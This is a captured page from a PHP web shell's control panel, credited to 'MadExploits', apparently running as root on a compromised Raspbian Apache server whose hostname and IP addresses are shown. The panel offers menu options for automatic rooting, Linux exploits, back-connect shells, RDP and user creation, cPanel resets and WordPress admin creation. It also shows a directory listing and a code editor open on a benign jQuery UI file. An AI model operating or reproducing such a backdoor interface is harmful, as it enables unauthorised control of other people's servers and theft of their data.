Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
javascript /
jquery-ui /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
effects
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
core.js
341
B
-rw-r--r--
core.min.js
239
B
-rw-r--r--
data.js
903
B
-rw-r--r--
data.min.js
331
B
-rw-r--r--
disable-selection.js
1.03
KB
-rw-r--r--
disable-selection.min.js
444
B
-rw-r--r--
effect.js
39.84
KB
-rw-r--r--
effect.min.js
22.64
KB
-rw-r--r--
escape-selector.js
475
B
-rw-r--r--
escape-selector.min.js
300
B
-rw-r--r--
focusable.js
2.21
KB
-rw-r--r--
focusable.min.js
1.08
KB
-rw-r--r--
form-reset-mixin.js
1.75
KB
-rw-r--r--
form-reset-mixin.min.js
932
B
-rw-r--r--
form.js
551
B
-rw-r--r--
form.min.js
229
B
-rw-r--r--
ie.js
356
B
-rw-r--r--
ie.min.js
198
B
-rw-r--r--
jquery-1-7.js
2.47
KB
-rw-r--r--
jquery-1-7.min.js
1.08
KB
-rw-r--r--
keycode.js
790
B
-rw-r--r--
keycode.min.js
296
B
-rw-r--r--
labels.js
1.67
KB
-rw-r--r--
labels.min.js
608
B
-rw-r--r--
plugin.js
991
B
-rw-r--r--
plugin.min.js
591
B
-rw-r--r--
position.js
14.53
KB
-rw-r--r--
position.min.js
9.49
KB
-rw-r--r--
safe-active-element.js
984
B
-rw-r--r--
safe-active-element.min.js
397
B
-rw-r--r--
safe-blur.js
493
B
-rw-r--r--
safe-blur.min.js
244
B
-rw-r--r--
scroll-parent.js
1.22
KB
-rw-r--r--
scroll-parent.min.js
645
B
-rw-r--r--
tabbable.js
853
B
-rw-r--r--
tabbable.min.js
338
B
-rw-r--r--
unique-id.js
947
B
-rw-r--r--
unique-id.min.js
379
B
-rw-r--r--
version.js
293
B
-rw-r--r--
version.min.js
158
B
-rw-r--r--
widget.js
19.29
KB
-rw-r--r--
widget.min.js
11.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery-1-7.js
/*! * jQuery UI Support for jQuery core 1.7.x 1.12.1 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * */ //>>label: jQuery 1.7 Support //>>group: Core //>>description: Support version 1.7.x of jQuery core ( function( factory ) { if ( typeof define === "function" && define.amd ) { // AMD. Register as an anonymous module. define( [ "jquery", "./version" ], factory ); } else { // Browser globals factory( jQuery ); } }( function( $ ) { // Support: jQuery 1.7 only // Not a great way to check versions, but since we only support 1.7+ and only // need to detect <1.8, this is a simple check that should suffice. Checking // for "1.7." would be a bit safer, but the version string is 1.7, not 1.7.0 // and we'll never reach 1.70.0 (if we do, we certainly won't be supporting // 1.7 anymore). See #11197 for why we're not using feature detection. if ( $.fn.jquery.substring( 0, 3 ) === "1.7" ) { // Setters for .innerWidth(), .innerHeight(), .outerWidth(), .outerHeight() // Unlike jQuery Core 1.8+, these only support numeric values to set the // dimensions in pixels $.each( [ "Width", "Height" ], function( i, name ) { var side = name === "Width" ? [ "Left", "Right" ] : [ "Top", "Bottom" ], type = name.toLowerCase(), orig = { innerWidth: $.fn.innerWidth, innerHeight: $.fn.innerHeight, outerWidth: $.fn.outerWidth, outerHeight: $.fn.outerHeight }; function reduce( elem, size, border, margin ) { $.each( side, function() { size -= parseFloat( $.css( elem, "padding" + this ) ) || 0; if ( border ) { size -= parseFloat( $.css( elem, "border" + this + "Width" ) ) || 0; } if ( margin ) { size -= parseFloat( $.css( elem, "margin" + this ) ) || 0; } } ); return size; } $.fn[ "inner" + name ] = function( size ) { if ( size === undefined ) { return orig[ "inner" + name ].call( this ); } return this.each( function() { $( this ).css( type, reduce( this, size ) + "px" ); } ); }; $.fn[ "outer" + name ] = function( size, margin ) { if ( typeof size !== "number" ) { return orig[ "outer" + name ].call( this, size ); } return this.each( function() { $( this ).css( type, reduce( this, size, true, margin ) + "px" ); } ); }; } ); $.fn.addBack = function( selector ) { return this.add( selector == null ? this.prevObject : this.prevObject.filter( selector ) ); }; } ; } ) );
Close